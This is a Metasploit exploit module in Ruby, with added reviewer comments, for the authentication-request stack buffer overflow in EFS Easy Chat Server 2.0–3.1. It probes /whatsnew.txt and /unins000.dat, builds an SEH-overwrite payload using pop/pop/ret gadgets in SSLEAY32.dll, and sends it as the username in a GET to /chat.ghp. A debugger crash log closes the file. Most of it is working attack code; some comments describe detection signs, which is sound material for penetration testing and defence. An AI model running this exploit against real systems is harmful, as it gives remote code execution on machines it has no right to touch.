##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  # Banner regex the HttpClient mixin compares against the target's HTTP
  # Server header before the module is run.
  # NOTE(review): the pattern names "1.0" while the affected releases are
  # 2.0-3.1 (see Targets); presumably the product reports a fixed 1.0 in its
  # banner regardless of version -- confirm against a live header.
  HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  # Module metadata: affected versions, payload constraints and the SEH
  # return address used per target. Target 0 ("Automatic Targeting") picks
  # targets[1] or targets[2] from the version read off the target in #exploit.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in EFS Software Easy Chat
          Server versions 2.0 to 3.1. By sending an overly long authentication
          request, an attacker may be able to execute arbitrary code.
        },
        'Author' => [
          'LSO <lso[at]hushmail.com>', # original metasploit
          'bcoles' # metasploit
        ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'CVE', '2004-2466' ],
          [ 'OSVDB', '7416' ],
          [ 'OSVDB', '106841' ],
          [ 'BID', '25328' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Privileged' => false,
        'Payload' => {
          'Space' => 7000,
          # 0x20, 0x25 and 0x26 are space, '%' and '&' -- consistent with the
          # payload travelling unencoded inside a query string (#exploit sets
          # 'encode_params' => false); 0x00/0x0a/0x0b/0x0d/0x0f are the usual
          # string/line terminators.
          'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          # Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:
          # -- Windows XP SP 3 (x86) (EN)
          # -- Windows 7 SP 1 (x64) (EN)
          # -- Windows 8 SP 0 (x64) (EN)
          [ 'Automatic Targeting', { 'auto' => true } ],
          # p/p/r (pop/pop/ret) gadget in SSLEAY32.dll, selected for v2.0
          [ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],
          # p/p/r (pop/pop/ret) gadget in SSLEAY32.dll, selected for v2.1-3.1
          [ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]
        ],
        'DisclosureDate' => '2007-08-14',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Vulnerability check, driven by two unauthenticated GET probes.
  #
  # Returns Exploit::CheckCode::Safe when no version can be read from
  # /whatsnew.txt or the version is outside 2.x / 3.0 / 3.1, Detected when
  # the version matches but the install path cannot be read from
  # /unins000.dat, and Appears when both were retrieved. Both probes show up
  # in the web server log ahead of any exploit attempt.
  def check
    version = get_version
    if not version
      return Exploit::CheckCode::Safe
    end

    vprint_status "Found version: #{version}"
    # ^ and $ are per-line anchors, but get_version only ever returns a
    # single "\d.\d" capture, so the match is effectively whole-string here.
    if version !~ /^(2\.\d|3\.0|3\.1)$/
      return Exploit::CheckCode::Safe
    end

    path = get_install_path
    if not path
      return Exploit::CheckCode::Detected
    end

    vprint_status "Found path: #{path}"
    return Exploit::CheckCode::Appears
  end

  #
  # Get software version from change log
  #
  # Fetches /whatsnew.txt and returns the "<major>.<minor>" number captured
  # from the first "What's new in Easy Chat Server V..." line. Returns nil
  # (implicitly) when there is no response or the body does not match.
  #
  def get_version
    res = send_request_raw 'uri' => '/whatsnew.txt'
    if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/
      return "#{$1}"
    end
  end

  #
  # Get software installation path from uninstall file
  #
  # Fetches /unins000.dat from the web root and returns the drive-letter
  # path (2..256 non-NUL characters) that precedes a "\<name>.htm" entry.
  # Returns nil (implicitly) when there is no response or no match.
  #
  # NOTE(review): the drive-letter group is optional, so the regex can match
  # with $1 == nil; "#{$1}" then returns "" which is truthy, and a caller
  # testing `if not path` will not treat it as a failure. Returning $1 itself
  # would yield nil in that case. The interpolation also produces a fresh,
  # unfrozen String, which #exploit relies on to append to it in place.
  #
  def get_install_path
    res = send_request_raw 'uri' => '/unins000.dat'
    if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i
      return "#{$1}"
    end
  end

  # Builds and sends the overflowing authentication request.
  #
  # With target 0 the version read from /whatsnew.txt selects targets[1]
  # (v2.0) or targets[2] (v2.1-3.1); any other value aborts with
  # Failure::NoTarget. The install path is required because the filler is
  # sized so that path + filler is exactly 256 bytes before the SEH record
  # produced by generate_seh_payload (see the =begin notes at the end of the
  # file). Aborts with Failure::UnexpectedReply when the path is unavailable.
  def exploit
    # get target
    if target.name =~ /Automatic/
      version = get_version
      vprint_status "Found version: #{version}" if version
      if not version or version !~ /^(2\.\d|3\.0|3\.1)$/
        fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
      elsif version =~ /(2\.0)/
        my_target = targets[1]
      elsif version =~ /(2\.\d|3\.0|3\.1)/
        my_target = targets[2]
      end
    else
      my_target = target
    end

    # get install path
    path = get_install_path
    if not path
      fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")
    end
    # Appended in place; get_install_path returns a fresh String each call.
    path << "\\users\\"
    vprint_status "Using path: #{path}"

    # send payload
    # NOTE(review): get_install_path accepts up to 256 characters after the
    # drive letter, plus the 7-byte suffix above, so an unusually long install
    # path would make this length negative -- assumes real paths are shorter.
    sploit = rand_text_alpha(256 - path.length)
    sploit << generate_seh_payload(my_target.ret)
    print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})"
    # Single GET to /chat.ghp; 'encode_params' => false sends the username
    # bytes as-is. Detection: a username parameter far longer than any real
    # user name (alphabetic filler followed by up to 7000 bytes of payload),
    # preceded by requests for /whatsnew.txt and /unins000.dat.
    send_request_cgi({
      'uri' => '/chat.ghp',
      'encode_params' => false,
      'vars_get' => {
        'username' => sploit,
        'password' => rand_text_alphanumeric(rand(10) + 1),
        'room' => 1,
        'sex' => rand_text_numeric(1)
      }
    }, 5) # second argument: presumably the response timeout in seconds -- confirm in HttpClient
  end
end
=begin

0x004144C8 calls sprintf with the following arguments:
sprintf(&FileName, "%susers\\%s", path, username);

Since we can make the username larger than the allocated buffer size,
we end up overwriting SEH with a PPR (pop/pop/ret) from SSLEAY32.dll and
nSEH with a short jmp to the beginning of our shellcode.

(46c.144): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea
eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
EasyChat+0x45f34:
00445f34 8a02 mov al,byte ptr [edx] ds:0023:41414141=??

0:005> !exchain
01216dd8: 41414141
Invalid exception stack at 41414141
=end